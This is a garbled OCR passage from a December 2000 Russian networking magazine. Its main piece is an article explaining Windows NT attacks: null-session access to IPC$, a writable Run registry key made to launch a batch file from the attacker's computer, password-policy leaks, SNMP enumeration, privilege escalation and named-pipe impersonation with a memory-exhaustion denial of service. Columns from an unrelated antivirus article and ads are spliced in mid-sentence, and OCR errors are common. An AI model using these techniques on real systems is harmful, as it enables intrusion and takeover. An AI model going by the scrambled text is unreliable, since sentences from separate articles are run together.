друг от друга корзины отличаются всего
лишь идентификатором пользователя SID,
который злоумышленник может легко выяс-
нить (с помощью специальных функций API
идентификатор пользователя можно устано-
вить по его имени). Если злоумышленник из-
прав доступа к ним), но все же описан-
ная атака достаточно часто оказывает-
ся успешной.
Но, помимо гостевого входа, отклю-
чить который очень просто, в
Windows NT предусмотрена поддерж-
ка анонимного пользователя с правами
на просмотр списка пользователей,
разделенных ресурсов и некоторых
(между прочим, достаточно многих)
ветвей системного реестра. Аноним-
ный пользователь необходим для орга-
низации нуль сеансов (NULL session),
предназначенных для выполнения
действий, нс требующих аутентифика-
ции (или в тех случаях, когда аутенти-
фикация невозможна). Например,
пусть в сети находятся два домена
Windows NT, условно обозначаемых
Di и Е)2. Если Di доверяет D2, а сам D2
не доверяет Di, то для получения спи-
ска пользователей и групп домена D2
приходится прибегать к анонимному'
подключению.
Анонимным пользователям досту-
пен специальный ресурс IPCS (inter-
process communication), подключить
который можно командой net use
\\name\IPCS /USER:, где name — сетевое
имя компьютера или его IP-адрес. Та-
ким образом, злоумышленник полу-
чает возможность запускать User
Manager для просмотра пользовате-
лей и групп, Event Viewer — для про-
менит идентификатор своей корзины на
идентификатор корзины жертвы, то удаляе-
мые жертвой файлы попадут в руки зло-
умышленника.
Впрочем, если существуют две корзины
с одинаковыми идентификаторами, систе-
ма будет вести себя непредсказуемо. Поэ-
тому стабильная работа обеспечивается
лишь в том случае, когда злоумышленник
подделывает свою корзину до создания
корзины жертвы, что маловероятно, так как
обычно корзина создается сразу же после
регистрации нового пользователя системы.
Но до регистрации пользователя его SID не
известен.
Таким образом, подобная уязвимость, до-
статочно любопытная сама по себе, не пред-
ставляет большой опасности.
смотра журнала событий, а кроме то-
го, другие средства удаленного адми-
нистрирования, где используется про-
токол SMB.
Ветвь реестра HKLM\Software\
Microsoft\Windows\CurrentVersion\Run
содержит имена программ, запускае-
мых при каждой локальной регистра-
ции пользователя, причем она дос-
тупна анонимному пользователю как
для чтения, так и для модификации.
Изменяя ее по своему усмотрению,
злоумышленник сможет выполнить
не только одну из программ, храня-
щихся на сервере, но и любую про-
грамму, из установленных на его
компьютере! Для этого он должен за-
писать нечто вроде \\mycomputer\
myprog.bat, где mycomputer — имя
компьютера злоумышленника или
его IP-адрес. Командный файл вы-
полняется с привилегиями локально-
го пользователя (а локально на сер-
вере, как правило, регистрируются
администраторы). А получив права
администратора, злоумышленник
может сделать с сервером все что
угодно (например, узнать имена и
хэш-значения всех остальных поль-
зователей).
В 1997 г. появилась программная ре-
ализация такой атаки, получившая на-
звание RedButton. Компания Microsoft
выпустила «горячую» заплатку для
> http://www.lanmag.ru
Декабрь 2000 89
Обзор антивирусных средств от AIDSTEST до информационной иммунной системы
ПОЯВЛЕНИЕ АНТИВИРУСОВ
Фактически, как только появились компьютеры, появились и вредонос-
ные программы. Однако пока и то и другое существовало в единичном
экземпляре, антивирусные программы не требовались. Евгений Каспер-
ский пишет, что для появления вирусов необходимы две вещи: широкое
распространение платформы и её слабая защищённость. Исторически
сложилось так, что персональные компьютеры были слабо защищены.
Как только количество персональных компьютеров начало расти, появи-
лось и множество новых вирусов. И если первоначально лечение осуще-
ствлялось самими владельцами компьютеров и системными админист-
раторами, то последовавший затем рост числа вирусов привёл к созда-
нию множества программ, ориентированных на их лечение. Владелец
заражённого компьютера шёл на расположенный поблизости рынок и
покупал дискету с AIDSTEST, пытаясь с её помощью избавится от зараже-
ния. Иногда это помогало, иногда нет. Из медицинской практики извест-
но, что легче предотвращать заражение, чем лечить его.
ЭВРИСТИЧЕСКИЕ АНАЛИЗАТОРЫ И КАРАНТИН
Предотвращать заражение с помощью существовавших антивирусных
программ можно было, например, запуская проверку каждый раз при
запуске компьютера. Этот способ имеет как минимум два недостатка.
Во-первых, он хорошо работает не для всех классов вирусов, во-вто-
рых, при этом достаточно сложно защитить само антивирусное прило-
жение. Гораздо эффективнее, если антивирусное приложение запуска-
ется при загрузке операционной системы и резидентно находится в па-
мяти, отслеживая всё, что происходит, в том числе и вирусоподобное
поведение выполняемых приложений. Это можно реализовать тремя
способами. Первый — обнаружение последовательностей кода, кото-
рые похожи на известные вирусы, но незначительно от них отличаются.
Второй способ — отслеживание поведения запущенного приложения.
Если программа модифицирует другую, а та в свою очередь третью и
т.д., то с это вирус по определению. Третий способ состоит в том, чтобы
проверить выполнение подозрительного кода в защищённой области. В
совокупности эти три способа составляют эвристический анализ,
встроенный в антивирусные программы.
Действуя описанным выше образом, антивирусная программа спо-
собна обнаружить файл, заражённый неизвестным доселе вирусом, но
она не сможет вылечить его. Как следует поступить с таким файлом?
Первый и самый простой способ — это удалить его. Способ этот имеет
как минимум два недостатка: потеря возможно необходимого для рабо-
ты файла и, что существенно хуже, теряется информация о найденном
вирусе, в то время как не существует никаких гарантий, что вирус не
распространяется на другие файлы. Таким образом, необходимо сохра-
нить найденный файл в безопасном месте так, чтобы он не вызвал даль-
нейшего заражения. Так появился карантин — специальная область на
диске, в которую антивирусное приложение складывает подозритель-
ные файлы. Как поступить дальше с этими файлами? Было бы логично
ж МИtotal Exchan9e- L°tus Notes
Рисунок 1. Трехуровневая модель защиты.
Рисунок 2. Схема работы «Проверь и отправь 1».
воспользоваться сервисом, предоставляемым антивирусными компа-
ниями и отправить их производителю антивируса. Это можно сделать,
отправив дискету по почте, а можно отправить файл с помощью элек-
тронной почты.
ТРЁХУРОВНЕВАЯ МОДЕЛЬ ЗАЩИТЫ
Развитие антивирусных технологий происходило в рамках развития ин-
формационных технологий в целом. Компьютеры объединялись в сети,
размер корпоративных сетей рос, появилась электронная почта и Интер-
нет. Это сделало возможным появление новых типов вирусов, связанных
с новыми приложениями, распространяющихся с большой скоростью и
использующих электронную почту и протоколы Интернет. Стало ясно, что
недостаточно предотвращать заражение на одном отдельно взятом ком-
пьютере. Необходимо иметь стратегию защиты всей сети. Появившаяся
стратегия получила название трёхуровневой (Рис.1). Прежде всего оче-
видно, что необходимо защищать точку входа в сеть из Интернет, по-
скольку именно оттуда попадает большая часть (около 70%-тов) виру-
сов. Это уровень почтовых шлюзов и межсетевых экранов. Необходимо
защищать файл-сервера и сервера групповой работы, поскольку именно
на них содержится наиболее ценная информация. Безусловно, антиви-
рус не является заменой резервному копированию, поскольку есть воз-
можность оказаться в ситуации, когда резервные копии заражены, а ви-
рус активируется спустя полгода после заражения. Имеет смысл также
защищать рабочие станции, поскольку это второй по частоте источник
попадания вирусов. Даже если рабочие станции не содержат важной ин-
формации, защита снизит время аварийного восстановления.
ЦЕНТРАЛЬНЫЙ КАРАНТИН И ИНФОРМАЦИОННАЯ
ИММУННАЯ СИСТЕМА
Итак, антивирусная защита развёрнута во всей организации и надо быть
готовым к вирусам, которые способны в считанные часы распростра-
нять заражение по всей сети. Идея, получившая название информаци-
онной иммунной системы заключается в том, чтобы обнаружив зараже-
ние, отправить образец нового вируса в антивирусный центр, получить
обновление и распространить его во всей сети прежде, чем успеет рас-
пространиться сам вирус.
Для этого прежде всего необходимо собрать все подозрительные
файлы в одном месте. Какое бы антивирусное приложение ни работало,
будь то антивирус для Microsoft Exchange, или антивирус для Windows
95, все найденные подозрительные файлы должны быть собраны в од-
ном месте и приготовлены к отправке производителю антивируса. Такое
место представляет собой Центральный карантин.
Итак, все подозрительные файлы собраны в центральном карантине
в кодированном состоянии и приготовлены к отправке в антивирусный
центр. Как осуществить эту отправку? Поскольку исторически сложи-
лось так, что отправка подозрительных файлов осуществляется по поч-
те, а впоследствии по электронной почте, логичным продолжением это-
го явилась система, автоматически отправляющая подозрительные
файлы, используя SMTP протокол
Образец
Пользователь
корпоративный
Рисунок 3. Тех. процесс Антивирусного центра.
ПОВЕРЬ И ОТПРАВЬ. ВЕРСИЯ 1
Схематично система проверь и отправь первой версии изображена на
Рис.2. Антивирус поместил подозрительные файлы в центральный ка-
рантин и запрашивает разрешение на отправку.
На первом шаге осуществляется соединение по HTTP протоколу на
сервер антивирусной компании с тем, чтобы проверить уровень нагруз-
ки на этот сервер (Рис.З). На этом этапе мы можем выставить приорите-
ты. То — есть корпоративные заказчики имеют приоритет перед домаш-
ними пользователями. Покупатели специальных программ поддержки и
заказчики, имеющие глобальное соглашение с компанией имеют в свою
очередь приоритет над корпоративными заказчиками.
После того, как сервер выдал разрешение на отправку образца,
сервис центрального карантина связывается с почтовым шлюзом анти-
вирусной компании и через SMTP протокол отправляет выбранный
файл в почтовый ящик. В свою очередь система, осуществляющая тех-
процесс антивирусной компании, каждые несколько минут проверяет
почтовые ящики с целью обнаружить новые файлы. Считав файл из
почтового ящика прежде всего необходимо присвоить ему порядковый
номер и сообщить его заказчику с тем, чтобы впоследствии он мог про-
контролировать ход работ над посланным им экземпляром. В данном
случае присваиваемый порядковый номер есть контрольная сумма
файла. Это позволяет определить сразу две вещи: 1. не является ли
файл уже исследованным и 2. не совпадает ли он со стандартным фай-
лом (например файлом Windows).
ПОВЕРЬ И ОТПРАВЬ. ВЕРСИЯ 1 ПОВЕРЬ И ОТПРАВЬ. ВЕРСИЯ 2
Пользователи вручную посылают образцы в антивирусный центр из сервера Изолятора. Автоматическая отсылка образцов в антивирусный центр из сервера Изолятора.
Новые базы приходят обратно ад- министратору по почте. Автоматически обновляет базы че- рез HTTPS.
Использует доставку через SMTP. Использует HTTPS который вклю- чает защиту и аутентификацию.
Использует SMTP с не гарантиро- ванной доставкой. Гарантированная доставка. Опове- щения администратора обо всех происшествиях.
Зависит от почтовой программы и почтовых серверов. Не зависит от почтовой системы или сервера.
Не показывает текущий статус образца. Показывает статус образца в кон- соли сервера изолятора.
Ежедневные внеплановые обнов- ления через FTP для ручной за- грузки и установки. Только если вирус обнаружен и требует внеплановых обновлений, которые автоматически сгружают- ся и устанавливаются.
Рисунок 4. Сравнения версий «Проверь и отправь».
Следующий шаг — это проверка с помощью антивирусного средст-
ва с максимальным уровнем эвристики на предмет нахождения в нём
известных вирусов. Если такой вирус найден, то в случае, если отсылка
осуществлялась продуктом для домашнего использования, автомати-
чески формируется возврат.
Если пользователь корпоративный или ни одно из условий не верну-
ло положительного ответа, тогда образец помещается в центральную
базу данных, которая видна со всех точек внутри сети антивирусной ко-
пании для того, чтобы специалист по данному типу файлов или по дан-
ному типу вирусов начал над ним работу.
На основании проведенной работы делается заключение. В общем
случае оно может быть трёх типов: 1 -е данный файл не содержит виру-
сов. Тут тоже возможны варианты, например произошло ложное сраба-
тывание данного антивируса или антивируса какой либо другой компа-
нии. 2-й вариант — данный файл заражён вирусом, он уже обнаружива-
ется и достаточно обновить антивирусное приложение. И 3-й вариант —
файл является новым вирусом и в этом случае к сообщению приклады-
вается обновление антивирусной программы.
На Рис.4 показана статистика, иллюстрирующая эффективность
внедрения иммунной системы. В сотни раз увеличилось количество
рассматриваемых ежемесячно образцов и одновременно снизить вре-
мя реакции, что позволяет как минимум предотвратить заражение, про-
Информационная имунная система в цифрах
Кол-во образцов —•— Время реакции, ч. |
Рисунок 5. Статистика Антивирусного центра.
изошедшее в одной компании в остальных и как максимум предотвра-
тить распространение заражения в одной отдельно взятой корпорации.
Предлагаемая система, однако, наряду с достоинствами имеет ряд
недостатков, связанных с отправкой и получением обновлений по элек-
тронной почте. 1. SMTP не является on-line протоколом и следователь-
но не позволяет заказчику рассчитывать на какое то определённое вре-
мя работы с его образцом. С другой стороны это не позволяет антиви-
русной компании гарантировать время работы над тем или иным фай-
лом, поскольку ответ может застрять где-то по дороге. 2. Получение ан-
тивирусных обновлений по почте основано на доступности почтового
сервера, который зачастую может являться одной из главных целей ви-
русной атаки.
ПОВЕРЬ И ОТПРАВЬ. ВЕРСИЯ 2
Таким образом, представилось целесообразным заменить отправку с
помощью SMTP протокола и получения образцов с помощью электрон-
ной почты на более надёжную систему, при которой соединение проис-
ходит через HTTPS протокол. На сервер антивирусной компании кладёт-
ся образец нового вируса и по окончании работы сервер антивирусной
компании в свою очередь связывается с сервером заказчика и обновля-
ет на нём антивирусные базы. Причём служба центрального карантина
позволяет отслеживать весь ход работы. Работа системы «Проверь и
отправь 2» проиллюстрирована в таблице (Рис. 4) на примере сравне-
ния с предыдущей версией.
Symantec,.
С вопросами можно обратится
в компанию Symantec по адресу:
109180 Москва 1-й Хвостов пер. 11а,
тел. +7 (095) 2383822, www.symantec.ru
или написать автору по адресу: Mike@symantec.ru
> ЗАЩИТА ИНФОРМАЦИИ:
Windows NT 3.51 и включила соответ-
ствующие исправления в Service Pack 3
для Windows NT 4.0. Одновременно в
«базе знаний» Microsoft (Microsoft
Knowledge Base) было опубликовано
достаточно подробное техническое опи-
сание сути проблемы (документ
Q.H3474)-
Но Service Pack не устранял воз-
можность анонимного подключения, а
только ограничивал права анонимного
пользователя. Компания Microsoft от-
крыто признает (в документе Q129457),
что «...в случае разрешения доступа
RestrictAnonymous анонимное соеди-
нение может получить информацию о
политике в отношении паролей с
Windows NT Server. Данная политика
определяет правила для домена
Windows NT касательно минимальной
длины паролей, допустимости пустых
паролей, срока годности и истории па-
ролей».
Технически регистрация в системе
организована так, что проверка полити-
ки в отношении паролей осуществляет-
ся до аутентификации пользователя.
Например, заведомо короткий пароль
не стоит и проверять. В Windows NT
правила доступны всем, в том числе и
анонимному пользователю (даже после
установки Service Pack 3!). В результа-
те злоумышленник сможет узнать: ми-
нимальную длину пароля, как часто ме-
няются пароли и какое количество не-
удачных попыток регистрации блоки-
рует учетную запись (если блокировка
включена). Полученная информация
значительно облегчает проникновение
в систему.
А еще в правилах открыто хранятся
предыдущие используемые пароли или
их хэши (так называемая история паро-
лей). С точки зрения безопасности па-
роли необходимо периодически ме-
нять, причем они не должны повторят-
ся (во всяком случае, спустя короткое
время). Например, в истории могут
храниться пять последних паролей
пользователя, и при смене пароля сис-
тема проверяет, не совпадает ли новый
пароль с одним из них. Конечно, это
старые, уже недействительные пароли.
Однако знакомство с ними позволяет
понять, по какому принципу назнача-
ются пароли: выбираются ли словар-
ные слова, даты рождения родственни-
ков, имена любимых хомячков или аб-
солютно случайные последовательно-
сти. Кстати, не исключено, что рано
или поздно пользователь вновь выбе-
рет один из старых паролей, возможно,
несколько его видоизменив.
Microsoft подтверждает наличие
этой «дыры» (подробности в доку-
менте Q129457), предостерегая поль-
зователей и администраторов от по-
вторного выбора паролей. Но это не
решает проблемы. Если пароли выби-
раются не абсолютно случайно, то,
изучая их последовательность, зло-
умышленник может угадать очеред-
ной пароль или, по крайней мере, со-
кратить число вариантов перебора.
Среди множества пользователей на-
верняка окажется тот, кто халатно от-
носится к требованиям соблюдения
политики безопасности и всегда вы-
бирает короткие, запоминающиеся
последовательности символов (а, сле-
довательно, предсказуемые).
Как утверждают специалисты
Microsoft, W'indows NT позволяет ог-
раничить рабочие станции, с которых
пользователь может входить в систе-
му. И это чистая правда — администра-
тор в состоянии легко контролировать
легального пользователя (в чем нетру-
дно убедиться каждому). Казалось бы,
у злоумышленника не остается шансов
проникнуть в сеть, даже если он воору-
жен именем и паролем пользователя.
Увы! Прикладной протокол SMB реа-
лизуется поверх транспортных прото-
колов, совместимых с интерфейсом
NetBIOS. А при установлении соеди-
нения по протоколу NetBIOS, сервер
проверяет имя, сообщенное ему клиен-
том, а не его IP-адрес! Злоумышленни-
ку достаточно знать или выяснить ме-
тодом перебора, с каких рабочих стан-
ций разрешен вход на сервер, а подде-
лать их имена — дело техники. Если
быть совсем точным, сервер NetBIOS
вообще не проверяет переданное кли-
ентом имя — это забота сервера SMB, а
до начала сеанса SMB никакого прото-
колирования установленных соедине-
ний не ведется!
Другую полезную для себя инфор-
мацию злоумышленник может полу-
vrm
I клеммные боксы
электрошкафчики
командные панели
серверные корпуса...
Телекоммуникационные шкафы
19" стойки Rittal
настенные шкафы
телефонные кроссы
оптические боксы и шкафы
телекоммуникационные шкафы...
Патч-панели, розетки, кабеля Teleg
« UTP, STP, cat 5, cat5e,.
@ Telegartner
117630, Москва, ул. Архитектора Вла<
тел.: (095) 742 43 91/92, факс
http://www.
92 LAN/Журнал сетевых решений
> ЗАЩИТА ИНФОРМАЦИИ:
чить с помощью протокола SNMP. Дан-
ный протокол предназначен для мони-
торинга сети, и с его помощью админи-
страторы могут отслеживать и опера-
тивно реагировать на возникшие проб-
лемы, а также настраивать сеть на мак-
симальную производительность. Одна
из задач, возлагаемых на SNMP, — под-
держка распределенной базы управля-
ющей информации (Management
Information Base, MIB). Па узлах сети
находятся агенты — программные мо-
дули для сбора информации об управ-
ляемых объектах, сохраняющие полу-
ченную информацию в своих локаль-
ных переменных. Протокол SNMP
обеспечивает обмен контрольной ин-
формацией между элементами сети и
доступ к базе MIB.
При обмене сообщениями агенты ис-
пользуют механизмы аутентификации
(часто уязвимые для взлома), а для дос-
тупа к базе MIB злоумышленнику дос-
таточно знать так называемое имя сооб-
щества (community name), по умолча-
нию public. Среди прочего в базе MIB
Windows NT содержится следующая
информация:
1. таблица сервисов, выполняющихся
на сервере, включая название и со-
стояние сервиса;
2. число зарегистрированных не-
удачных попыток ввода пароля на
сервере;
3. тип разграничения доступа (на уров-
не пользователей или на уровне ре-
сурсов);
4. перечень сеансов, включая имена
станций клиентов и состояние
сеанса;
5. перечень учетных записей сервера;
6. перечень разделяемых ресурсов сер-
вера с указанием локальных путей.
Очевидно, что информация подоб-
ного рода значительно упрощает не-
санкционированное вторжение в систе-
му и не должна быть доступна. Извест-
но множество случаев, когда получен-
ная с помощью сервиса finger инфор-
мация — а этот сервис сообщает значи-
тельно меньше данных об активных
пользователях — использовалась для
проведения успешной удаленной ата-
ки. В наши дни finger уже становится
«экзотикой», так как обычно админист-
раторы его отключают. Насколько же
богаче информация, которую зло-
умышленник получает из базы М1В и с
помощью нуль-сеанса! Но, в отличие от
сервиса finger, их не так-то легко от-
ключить!
Все просчеты в системе безопасно-
сти, описанные выше, в той или иной
мере устраняются правильным адми-
нистрированием сети и нс гарантиру-
ют злоумышленнику проникновения
в систему. Часто атакующий действу-
ет наугад, отыскивая наименее защи-
щенный узел, а не пытается получить
доступ к какой-то одной, конкретной
машине.
РАСПАД ЯДРА
Если в коде ядра присутствуют ошиб-
ки, позволяющие пользователю вме-
шиваться в работу системных процес-
сов, то он сможет получить любые
привилегии, в том числе и админист-
ратора! Изучая работу модуля
ntoskrnl.exe, Константин Соболев об-
ратил внимание на то, что функция
NtAddAtom не контролирует значение
аргумента, указывающего адрес для
записи результатов своей работы. По-
скольку функция NtAddAtom выпол-
няется ядром и имеет привилегии
System, она может писать, что ей взду-
мается и куда вздумается. Между тем
функция Win32 API AddAtom содер-
жит переходной код, который сохра-
няет результат работы NtAddAtom в
локальной переменной, откуда и воз-
вращает значение пользователю. Од-
нако через прерывание 0х2Е можно по-
лучить доступ непосредственно к
функциям ядра, минуя высокоуровне-
вые оболочки.
Вообще же, если у пользователя есть
право отладки приложений, то ему дос-
тупны функции WriteProcessMemory и
CreateRemoteThread, с помощью кото-
рых он может как угодно манипулиро-
вать системой по своему усмотрению.
Поскольку ни один здравомыслящий
администратор потенциальному зло-
умышленнику такого права не даст, то-
му приходится присваивать его само-
стоятельно. Описание алгоритма по-
добной атаки выходит за рамки данной
статьи, мы же лишь отметим, что утили-
та Sechole, авторами которой являются
Прасад Дэбак, Сандип Фадке и Ми-
линд Борейт, позволяет заменить код
функции OpenProcess (проверяющей
наличие прав отладки приложений пе-
ред открытием процесса) и затем, поль-
зуясь отладочными функциями, вклю-
чить текущего пользователя в группу
администраторов.
Служба редиректора также имеет
ошибки реализации, позволяющие
любому пользователю получить пра-
ва администратора или нарушить
нормальную работу сервера, поэтому
на ней имеет смысл остановиться
подробнее.
> http://www.lanmag.ru
Декабрь 2000 93
> ЗАЩИТА ИНФОРМАЦИИ:
ЛЮКИ В КАНАЛАХ
Именованные каналы представляют со-
бой механизм межсетевой передачи
данных по виртуальному каналу, гаран-
тирующему доставку сообщений. (Поч-
товые ящики не гарантируют доставку
сообщений, и процесс-отправитель нс
получает уведомления о доставке адре-
сату сообщения.) Каналы реализованы
в виде псевдофайловой системы имено-
ванных каналов (Named Pipes File
System, NPFS), которая хранит все со-
общения в памяти и выдает их по запро-
су. Имена сообщений представляются в
виде \pipe\piрапагпе и доступны для тех
же функций, что и обыкновенные фай-
лы (например, CreateFile, ReadFile,
WriteFile).
Создать именованный канал (или
новый экземпляр существующего кана-
ла, если такой канал уже есть) позволя-
ет функция CreateNamedPipe. Каждый
экземпляр канала одновременно может
работать лишь с одним клиентом. Поэ-
тому при создании канала сервер сразу
же открывает несколько его экземпля-
ров. В документации Microsoft отмече-
но, что при запросе на подключение си-
стема ассоциирует клиента с любым не-
занятым экземпляром канала. Однако
эксперименты показывают, что клиент
всегда подключается к самому раннему
из созданных (или освободившихся)
каналов.
Создать экземпляр уже существую-
щего канала может любой'процесс, не-
зависимо от его привилегий и прав дос-
тупа. Система примет новый экземпляр
канала на равных правах со старым. И,
когда все созданные ранее экземпляры
окажутся занятыми, очередной клиент,
желающий установить соединение, бу-
дет связан с подложным каналом. При
этом функции интерфейса приложений
не позволяют клиенту узнать, какой
процесс обрабатывает канал, с которым
клиент установил соединение!
Это дает возможность внедрять в
вычислительную систему ложные объе-
кты и перехватывать входящий трафик.
Более того, у злоумышленника появля-
ется возможность унаследовать права
клиента! Процессу, породившему эк-
земпляр канала, достаточно вызвать
функцию ImpersonateNamedPipeClient,
выполняющую олицетворение клиента.
Вообще-то, эта функция задумывалась
как раз с обратной целью — понижения
привилегий потока, выполняющего
олицетворение.
Стремясь сделать систему более за-
щищенной, разработчики предложили
временно назначать потоку, обрабаты-
вающему подключение, права клиента,
установившего соединение. Пока при-
вилегии клиента не превышают приви-
легий сервера (а обычно это так и есть),
ничего интересного не происходит. Но
как только пользователь из группы
guest (или Everyone) создаст подлож-
ный экземпляр потока и дождется под-
ключения привилегированного клиента
(или администратора!), у него появится
возможность увеличить свои права
(иногда весьма значительно)!
Вообще-то прикладные программы
используют каналы крайне редко, и,
казалось бы, злоумышленнику рассчи-
тывать не на что. Однако система уда-
ленного администрирования задейст-
вует такие каналы весьма интенсивно.
Поэтому угроза перехвата прав адми-
нистратора вполне реальна! Причем
система не в состоянии обнаружить
вторжение нарушителя, если, конечно,
он сам не обратит на себя внимание,
совершая действия, записи о которых
сохраняются в протоколах и журна-
лах. Так, например, создание нового
пользователя (группы) наверняка не
пройдет незамеченным для админист-
ратора, но ничто не помешает зло-
умышленнику выполнять любые опе-
рации от его имени (скажем, копиро-
вать файлы).
Впрочем, возможности у злоумыш-
ленника, к счастью, далеко не безгра-
ничны. Дело в том, что олицетворяется
не пользователь, а поток, и по наследст-
ву полученные привилегии не переда-
ются. Это происходит потому, что в
Windows NT новому процессу назнача-
ется маркер доступа процесса-родите-
ля, а не маркер доступа потока, вызыва-
ющего CreateProcess. Поэтому зло-
умышленник не сможет запустить ни
одну программу, требующую прав ад-
министратора. Впрочем, ему не нужно
этого делать — достаточно воспользо-
ваться соответствующими системными
функциями (а они доступны, включая
те, выполнение которых требует нали-
чия прав администратора).
Программная реализация такой ата-
ки осуществлена В. Проскуриным сов-
местно с П. Девяпиным и С. Заливаки-
ным. Программа AdminTrap
(http://hackzone.ru/articles/AdmTrap.zi
р) создает «троянский» экземпляр од-
ного из системных каналов и ждет под-
ключения клиента. Если получение
прав администратора проходит успеш-
но, то, демонстрируя описанную выше
«слабость», программа создаст нового
пользователя в группе «Администрато-
ры», но для предотвращения несанкци-
онированного доступа в систему вновь
созданная учетная запись тут же блоки-
руется. Очевидно, разработчики не ста-
вили перед собой цель вторгнуться в
чужие системы, а стремились показать
наличие такой уязвимости.
Здесь необходимо привести одно не-
значительное техническое уточнение.
Поскольку системные сервисы заранее
создают несколько экземпляров кана-
лов, то, скорее всего, подложный экзем-
пляр канала никогда не дождется кли-
ента (в самом деле, в какой системе на-
берется десяток одновременно работа-
ющих администраторов?). Поэтому все
существующие каналы необходимо за-
нять работой, и заблокировать сервер,
чтобы он не мог создавать новые экзем-
пляры.
И такая возможность есть! Систем-
ные сервисы в Windows NT не ограни-
чивают максимальное количество соз-
даваемых экземпляров канала, а каж-
дый канал, как правило, обрабатывает-
ся отдельным потоком (т. е. происходит
классическое, популярное со времен
UNIX, расщепление процесса-обработ-
чика при запросе на очередное подклю-
чение). Все потоки и каждый экземпляр
канала требуют некоторого количества
оперативной памяти, и, если злоумыш-
ленник вздумает в бесконечном цикле
устанавливать все новые и новые соеди-
нения, оперативной памяти может по-
просту не хватить!
На первый взгляд никакой опасно-
сти нет, — Windows NT поддерживает
виртуальную память и при необходи-
мости умеет выгружать наименее нуж-
ные страницы на диск. Злоумышленник
же физически нс сможет работать со
всеми установленными соединениями
одновременно (памяти на его компью-
тере будет, скорее всего, меньше, чем у
сервера), и неактивные потоки без
ущерба для производительности могут
быть переведены в файл подкачки. Ка-
94 LAN/Журнал сетевых решений
> ЗАЩИТА ИНФОРМАЦИИ: БЕЗОПАСНОСТЬ WINDOWS NT
жется, все определяется лишь количе-
ством свободного места на диске.
Но при создании канала система раз-
мещает входящий и исходящий буферы
в неоткачивасмой памяти (non-paged
pool). Поэтому максимальное количест-
во экземпляров канала определяется
объемом неоткачивасмой памяти, выде-
ленной процессу. Таким образом, суще-
ствует возможность как заблокировать
создание новых экземпляров канала,
так и замедлить работу системы, ото-
брав у системных процессов всю сво-
бодную оперативную память и застав-
ляя их за каждой страницей обращаться
к диску.
Идея подобной атаки, которую окре-
стили PipeBomb, принадлежит II. Де-
вянину, а С. Заливакиным создана ее
программпая реализация.
Комбинируя AdminTrap со строго
дозированным воздействием на систе-
му посредством PipeBomb, они смогли
перехватить два соединения: winreg,
управляющее удаленным доступом к
реестру, и spoolss, отвечающее за уда-
ленное управление принтером. Однако
не исключено, что таким способом уда-
стся перехватить и другие соединения,
в том числе служебные, выполняемые
системой без непосредственного уча-
стия администратора. Например, кана-
лы Isass и LANMAN используются для
передачи по сети имени пользователя и
хэш-значения пароля во время сеанса
аутентификации, а механизм удален-
ного вызова процедур (RCP) задейст-
вует канал Isarpc.
Обе атаки успешно реализуются в
среде Windows NT 4.0 со всеми устано-
вленными Service Pack как в отноше-
нии рабочей станции, так и сервера.
Они осуществимы как из локальной се-
ти, так и из Internet, поскольку основа-
ны на прикладном протоколе SMB, а
он, как известно, может быть реализо-
ван поверх транспортного протокола
TCP. Трафик Internet можно пере-
крыть административными средствами,
установив фильтр, отсекающий все па-
кеты, содержащие заголовки SMB, но
такая мера неэффективна против зло-
умышленников, находящихся внутри
локальной сети.
Компания Microsoft устранила эту
проблему в Windows 2000, выпустив 2
августа 2000 г. заплату Service Control
Manager Named Pipe Impersonation, по-
лучить которую можно, обратившись
по адресу: http://www.microsoft.com/
Downloads/Release.asp ?ReleaseID =25432
. Данная заплата необходима для всех
трех платформ — Microsoft Windows
2000 Professional, Microsoft Windows
2000 Server и Microsoft Windows 2000
Advanced Server, а это значит, что не-
расторопные администраторы рискуют
подвергнуться атаке. Подробнее об
этом можно прочитать в технической
заметке Microsoft Security Bulletin
(MS00-053).
Вообще же отсутствие ограничений
на количество создаваемых объектов в
NT носит повсеместный характер. Наи-
более известный и характерный при-
мер — атакующая программа, создаю-
щая в бесконечном цикле огромное ко-
личество окон. Когда же отведенный
системой лимит исчерпывается (все па
свете рано или поздно кончается), ни-
кто, даже ядро системы, не может соз-
дать новое окно. Ни работать на компь-
ютере, ни удалить процесс, ни даже за-
вершить работу системы уже нельзя,
потому что для этого необходимо вы-
звать либо «Менеджер задач», либо ди-
алог «Завершение работы», между тем
новые окна создать невозможно! Все,
что остается, — это нажать «заветную»
клавишу Reset или выдернуть шнур из
сети. Насколько мне известно,
Microsoft ограничилась паллиативным
решением — окно Менеджера задач соз-
давалось сразу же после старта систе-
мы, но не отображалось на экране, пока
в нем не было необходимости, а вызов
Менеджера задач только менял атрибу-
ты уже существующего окна, чтобы он
мог быть доступен в любой критиче-
ской ситуации.
Спустя некоторое время появилась
простая программа, вместо окон в бес-
конечном цикле порождающая потоки
(а количество потоков, принадлежащих
процессу, нс ограничено, независимо от
его привилегий). Потоки же способны
«съесть» все процессорное время; ос-
тальные процессы с равным (или низ-
шим) приоритетом практически «зам-
рут». Впрочем, если у злоумышленника
пет права выполнять процессы с при-
оритетом выше среднего, т. е. Normal
(как правило, она у него имеется), то
злонамеренную программу можно уда-
лить с помощью Менеджера задач, но,
увы, не автоматически. Если же атака
будет осуществлена на сервер, то мно-
гие приложения окажутся парализо-
ванными до вмешательства админист-
ратора.
Итак, ситуацию с каналами нельзя
отнести в разряд непредвиденных, од-
нако — это первая реализация удален-
ного перехвата, устранить которую нс
позволяет даже правильное админист-
рирование. И никто нс гарантирует, что
завтра нс обнаружатся новые серьезные
«дыры» в системе безопасности. Даже
наверняка обнаружатся. Только вот где,
как и когда? LAN
Крис Касперски независимый автор.
С ним можно связаться по адресу:
kpnc@sendmail.ru.
Double-Take
программная кластеризация данных
ARCserveTT
лидер в технологиях резервного копирования
дисковый дефрагментатор для Windows
восстановление удаленных файлов в среде Widows NTZ2000
ЗАПИТА ДИСКОВЫХ
И ФАЙЛОВЫХ РЕСУРСОВ
® e-mail:info@quarta.ru
QUARTA Тел.: +7(095)234-4018
-^д^т1снноцоа1«8 www.quarta.ruwww.ntshop.ru
COMPUTER'
SSOOATES
►>:
Double-Take
| Microsoft
______Certified
Solution Provider
com
Кварта Технологии - крупнейший в России поставщик утилит и расширений для Windows NT/2000
> http://www.lanmag.ru
Декабрь 2000 95
> ПОУЧИТЕЛЬНЫМ ПРИМЕР:
Выход на орбиту
Спутниковый доступ
в Internet. Александр Авдуевский
Доступ в Internet через спутник —
решение, известное уже достаточ-
но давно. Несмотря на то что в
России до недавнего времени оно про-
двигалось не столь активно, как, ска-
жем, более традиционные методы дос-
тупа, сейчас на территории нашей стра-
ны действует уже несколько систем
спутникового Internet — западных и
